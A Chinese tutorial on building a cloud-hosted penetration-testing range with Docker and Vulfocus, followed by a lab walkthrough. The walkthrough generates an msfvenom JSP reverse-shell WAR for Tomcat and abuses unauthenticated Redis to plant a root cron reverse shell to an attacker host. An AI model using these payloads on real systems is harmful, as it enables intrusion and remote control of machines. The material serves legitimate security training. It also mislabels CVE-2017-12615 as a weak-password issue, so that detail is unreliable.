用Docker和Vulfocus在云服务器上快速搭建自己的渗透测试靶场（附场景编排实战）

云服务器实战：用Docker快速构建可分享的渗透测试靶场

在网络安全领域，实战训练的重要性不言而喻。传统的本地靶场环境往往存在配置复杂、难以分享、场景单一等问题。本文将带你探索如何在云服务器上，利用Docker和Vulfocus快速搭建一个灵活、可定制的渗透测试训练平台，特别适合安全团队协作或教育培训场景。

1. 云环境准备与基础配置

选择云服务提供商时，建议优先考虑国内主流平台如阿里云、腾讯云或华为云。这些平台对Docker的支持良好，且网络延迟较低。服务器配置方面，2核4G是起步推荐，如果计划运行多个漏洞环境，建议选择4核8G及以上配置。

云服务器安全组配置要点：

• 开放80端口用于Web访问
• 限制SSH端口(22)的访问IP范围
• 根据后续需要开放其他服务端口

安装Docker是第一步，以下是针对CentOS 7的安装命令：

# 安装必要工具 yum install -y yum-utils device-mapper-persistent-data lvm2 # 添加Docker仓库 yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo # 安装Docker引擎 yum install -y docker-ce docker-ce-cli containerd.io # 启动并设置开机自启 systemctl start docker systemctl enable docker

验证Docker安装成功：

docker --version # 预期输出：Docker version 20.10.x, build xxxxx

2. Vulfocus部署与初始化

Vulfocus是一个开箱即用的漏洞集成平台，其核心优势在于：

• 模块化设计：每个漏洞环境独立容器化
• 场景编排：可组合多个漏洞环境模拟真实网络
• 社区支持：持续更新的漏洞库

部署Vulfocus只需单条命令：

docker pull vulfocus/vulfocus:latest docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=你的服务器公网IP vulfocus/vulfocus

重要参数说明：

• -v /var/run/docker.sock:/var/run/docker.sock：允许Vulfocus管理Docker容器
• -e VUL_IP=公网IP：确保生成的访问链接正确

首次登录后应立即修改默认密码：

1. 访问http://你的服务器IP
2. 使用admin/admin登录
3. 在用户中心修改密码

安全提示：云环境部署务必使用强密码，建议包含大小写字母、数字和特殊字符，长度不少于12位。

3. 漏洞环境管理与场景设计

Vulfocus的核心价值在于其场景编排能力。以下是一个典型的多层渗透场景构建流程：

环境准备阶段：

1. 在"镜像管理"中下载所需漏洞环境

   • Tomcat弱口令(CVE-2017-12615)
   • Redis未授权访问
   • Struts2远程代码执行(S2-045)

2. 创建自定义网络

   docker network create --subnet=172.18.0.0/24 internal_net

场景编排步骤：

通过这种设计，可以模拟从外网渗透到内网横向移动的完整攻击链。场景保存后，会生成唯一访问链接，方便团队成员共同训练。

4. 实战演练：从外网到内网的渗透

以下演示一个典型的多层渗透过程：

第一阶段：边界突破

1. 利用Tomcat弱口令上传Webshell

   # 使用msfvenom生成payload msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f war > shell.war

2. 通过Tomcat管理页面上传WAR包
3. 获取初始立足点

第二阶段：内网探测

1. 上传轻量级扫描工具

   # 示例：使用静态编译的nmap curl -O https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap chmod +x nmap ./nmap -sn 172.18.0.0/24

2. 发现内网Redis服务

第三阶段：横向移动

1. 利用Redis未授权访问获取权限

   import redis r = redis.Redis(host='172.18.0.3', port=6379) r.set('shell', '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/攻击机IP/5555 0>&1\n\n') r.config_set('dir', '/var/spool/cron/') r.config_set('dbfilename', 'root') r.save()

2. 通过cron任务获取反弹shell

网络拓扑示意图：

[外网攻击者] → [Tomcat边界服务器] → [Redis内网服务器] → [Struts2核心系统]

5. 高级技巧与最佳实践

性能优化建议：

• 对不活跃的漏洞环境及时停止
• 限制单个场景的容器资源用量

  docker update --memory 512M --memory-swap 1G 容器ID

• 使用SSD云盘提升IO性能

教学场景设计原则：

1. 由易到难设置关卡
2. 每个关卡包含明确的学习目标
3. 提供适度的提示机制
4. 记录学员解题路径和用时

常见问题排查：

• 容器无法启动：检查端口冲突和资源限制
• 网络不通：验证Docker网络配置
• 漏洞利用失败：确认镜像版本和依赖项

实际训练中发现，将漏洞环境按CVSS评分分级部署，能有效提升学习曲线。初期建议从7分以下的中危漏洞开始，逐步过渡到高危漏洞的复杂利用。